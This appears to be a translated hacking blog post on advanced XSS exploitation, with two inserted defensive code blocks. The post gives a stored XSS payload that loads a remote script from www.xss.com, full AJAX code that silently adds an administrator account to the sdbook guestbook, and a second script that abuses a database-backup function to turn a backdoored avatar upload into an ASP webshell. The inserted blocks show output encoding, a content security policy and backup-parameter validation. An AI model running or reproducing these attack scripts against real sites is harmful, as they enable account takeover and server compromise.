Advanced exploitation of XSS
Author: cnryan
Source: http://hi.baidu.com/cnryan
Past uses of XSS have mostly been limited to planting trojans, phishing, stealing cookies and the like. Those methods never bring out what XSS can really do, because few people understand its essence: session hijacking, browser hijacking, and much more. What XSS can achieve goes far beyond what we imagine.
1. Privilege escalation via XSS
As AJAX has been adopted by many large SNS sites, XSS has become increasingly popular as well, and using AJAX in an XSS scenario lets it play its role far more effectively.
Places where users enter input are where XSS breeds most easily, for example guestbook and comment forms. I set up an sdbook guestbook; because sdbook does not properly filter user-supplied variables, an XSS vulnerability results.
The message is first delivered to the administrator. Used as a JavaScript hijack, it lets us do anything with the administrator's privileges, for example add an administrator.
Enter the cross-site code in the message body:
<script>s=document.createElement("script");s.src="http://www.xss.com/xss.js";document.getElementsByTagName("head")[0].appendChild(s);</script>
This code loads a remote JS file. The content of xss.js uses the XMLHttp object to send an asynchronous request: it submits to the server side via XMLHTTP without a page refresh and mimics adding an administrator.
First use Firebug to watch the network traffic, mainly to capture the data POSTed when an admin is added.
Then construct the AJAX code.
xss.js code:
var request = false;
// Obtain a working XMLHttpRequest object: the standard one first, then the legacy IE ActiveX names
if (window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if (request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if (window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for (var i = 0; i < versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
            break;
        } catch (e) {}
    }
}
xmlhttp = request;
add_admin();

// Replay the form submission captured with Firebug; it is sent with the session of the admin viewing the message
function add_admin() {
    var url = "/sdbook/admin/AdminUser/adminUser_Add.asp";
    var params = "UserName=cnryan&password1=123456&password2=123456&Purview=%B9%DC%C0%ED%D4%B1&Submit=%CC%E1%BD%BB";
    xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp.setRequestHeader("Content-length", params.length);
    xmlhttp.setRequestHeader("Connection", "close");
    xmlhttp.send(params);
}
When the admin views the message carrying the XSS, an administrator account is silently added in the back end, with username cnryan and password 123456, and in the end we hold the highest privileges over every user of the site.
Consider the guestbook scenario further. At first only the admin can view messages, so only the admin is exposed to the XSS. Once the content passes review and is published on the site, every user browsing the site may be hit by the XSS; we can then hijack many more sessions, and with those sessions it may even be possible to mount an XSS DoS against the server.
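The request above is same-origin and carries the admin's own cookies, so the place to stop it is the injection point. As an added example (not code from the original post or from sdbook), the following encodes the guestbook text at output time and pins script-src so the remote xss.js cannot be loaded; the function names, policy string and origin are assumptions.

```javascript
// Constructed example (not from the original post): output-encode the guestbook text
// that sdbook rendered raw, and restrict script-src so a remote xss.js is refused.
// Function names, the policy string and the origin used below are assumptions.

// Output-encode a user-supplied string before inserting it into HTML.
function encodeForHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render a stored message the safe way: every user-controlled field goes through the encoder.
function renderMessage(author, body) {
  return '<div class="msg"><b>' + encodeForHtml(author) + '</b>: ' + encodeForHtml(body) + '</div>';
}

// Content-Security-Policy that permits only same-origin scripts. Even if a stored payload
// slips through, the browser refuses to fetch http://www.xss.com/xss.js under this policy.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'";

// Minimal evaluation of the script-src directive above for a given script URL.
function cspAllowsScript(scriptUrl, pageOrigin) {
  const sources = CSP_HEADER.match(/script-src ([^;]+)/)[1].trim().split(/\s+/);
  const target = new URL(scriptUrl, pageOrigin).origin;
  return sources.includes("'self'") && target === pageOrigin;
}

// The payload from the post, embedded here as constructed sample input.
const PAYLOAD = '<script>s=document.createElement("script");s.src="http://www.xss.com/xss.js";'
  + 'document.getElementsByTagName("head")[0].appendChild(s);</script>';

// Returns what a reviewer would check: the encoded markup, that no <script> tag survives,
// and that the policy blocks the remote loader while still allowing the site's own scripts.
function demo() {
  const html = renderMessage('guest', PAYLOAD);
  return {
    html,
    inert: !/<script/i.test(html),
    remoteBlocked: !cspAllowsScript('http://www.xss.com/xss.js', 'http://guestbook.example'),
    localAllowed: cspAllowsScript('/static/app.js', 'http://guestbook.example'),
  };
}

console.log(demo());
```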
2. Obtaining a webshell via XSS
Why use AJAX? First, it is stealthy enough, the so-called "no refresh"; second, it handles all kinds of complex and changing data more effectively and quickly.
Having understood the flow and code of the example above, do you have different ideas?
Let us think about how to take the site's webshell.
Two conditions are necessary here. The first is that the back end has some function that can yield a shell, such as backing up the database or inserting a backdoor into the configuration file. The second is that we know information such as the site path and the default database. Many sites have these weaknesses.
Take getting a webshell through database backup as an example. This site allows uploading an avatar and records the address of our file: UploadFace\20090901.jpg. The image has a backdoor written into it. Then, in a white-box test environment, record the POSTed data, build the AJAX code into a remote JS file, and finally plant that JS at the site's XSS point.
The code is as follows:
var request = false;
// Obtain a working XMLHttpRequest object: the standard one first, then the legacy IE ActiveX names
if (window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if (request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if (window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for (var i = 0; i < versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
            break;
        } catch (e) {}
    }
}
xmlhttp = request;
getshell();

// Replay the "backup database" form captured in the white-box test: source file, backup folder, backup file name
function getshell() {
    var postStr = "DBpath=UploadFace%5C20090901.jpg&bkfolder=Databackup&bkDBname=shell.asp";
    xmlhttp.open("POST", "/ADMIN_data.asp?action=BackupData&act=Backup", true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp.setRequestHeader("Content-length", postStr.length);
    xmlhttp.setRequestHeader("Connection", "close");
    xmlhttp.send(postStr);
}
The code above was written while I tested an open-source program; different programs vary, but they are broadly similar.
The getshell() function backs up UploadFace\20090901.jpg as shell.asp under the Databackup directory.
The premise of the whole exploitation is that the site has an XSS and the crafted code can be injected into the back end successfully; as long as the administrator inadvertently triggers this XSS trap, we get the webshell.
3. XSS hacking based on open source
All the examples above were tested in a white-box environment, and many issues remain theoretical. Exploiting XSS for penetration in a real environment has its difficulties, but there are still ways. The core of XSS is its flexibility, which is why it is so sought after; for XSS penetration see jianxin's articles.
The XSS craze has arrived; I believe pentesters and cross-site specialists will push XSS's power to the limit.
Related material:
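The backup function only becomes a shell because it copies an arbitrary source file to an arbitrary name. As an added example (not code from the original post or from the program tested there), the following is the server-side check such a handler should run on the same form body: DB_ROOT, the allowed extension and the function names are assumptions.

```javascript
// Constructed example (not from the original post): validate the parameters of a
// "backup database" handler like the one the post drives with AJAX. It parses the same
// form body, then refuses a source outside the database directory or not a database file,
// and a destination that is not a single .mdb file name. Names below are assumptions.
const DB_ROOT = 'data';                  // assumed directory holding the site's database
const DB_EXTENSIONS = new Set(['.mdb']); // assumed: only Access database files may be copied

// Decode an application/x-www-form-urlencoded body into an object.
function parseForm(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Split a relative path on either separator; reject absolute paths, drive letters,
// empty segments, "." and "..", and any character outside a conservative allowlist.
function safeSegments(p) {
  if (typeof p !== 'string' || p === '' || /^[A-Za-z]:/.test(p) || /^[\\/]/.test(p)) return null;
  const segs = p.split(/[\\/]+/);
  for (const s of segs) {
    if (s === '' || s === '.' || s === '..' || !/^[A-Za-z0-9_.-]+$/.test(s)) return null;
  }
  return segs;
}

function extensionOf(name) {
  const i = name.lastIndexOf('.');
  return i < 0 ? '' : name.slice(i).toLowerCase();
}

// Validate the three parameters the backup form posts. Returns { ok, reason } or { ok, src, dst }.
function validateBackupRequest({ DBpath, bkfolder, bkDBname }) {
  const src = safeSegments(DBpath);
  if (!src) return { ok: false, reason: 'bad source path' };
  if (src[0] !== DB_ROOT) return { ok: false, reason: 'source outside database directory' };
  if (!DB_EXTENSIONS.has(extensionOf(src[src.length - 1]))) {
    return { ok: false, reason: 'source is not a database file' };
  }
  const folder = safeSegments(bkfolder);
  if (!folder || folder.length !== 1) return { ok: false, reason: 'bad backup folder' };
  if (typeof bkDBname !== 'string' || !/^[A-Za-z0-9_-]+\.mdb$/i.test(bkDBname)) {
    return { ok: false, reason: 'backup name must be a single .mdb filename' };
  }
  return { ok: true, src: src.join('/'), dst: folder[0] + '/' + bkDBname };
}

// The body the post's getshell() sends, and a legitimate request, as constructed inputs.
const ATTACK_BODY = 'DBpath=UploadFace%5C20090901.jpg&bkfolder=Databackup&bkDBname=shell.asp';
const LEGIT_BODY = 'DBpath=data%2Fsdbook.mdb&bkfolder=Databackup&bkDBname=sdbook_20090901.mdb';
console.log(validateBackupRequest(parseForm(ATTACK_BODY)), validateBackupRequest(parseForm(LEGIT_BODY)));
```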
http://www.80sec.com/xss-how-to-root.html
http://www.80sec.com/browser-hijacking.html
http://hi.baidu.com/aullik5/blog/item/6947261e7eaeaac0a7866913.html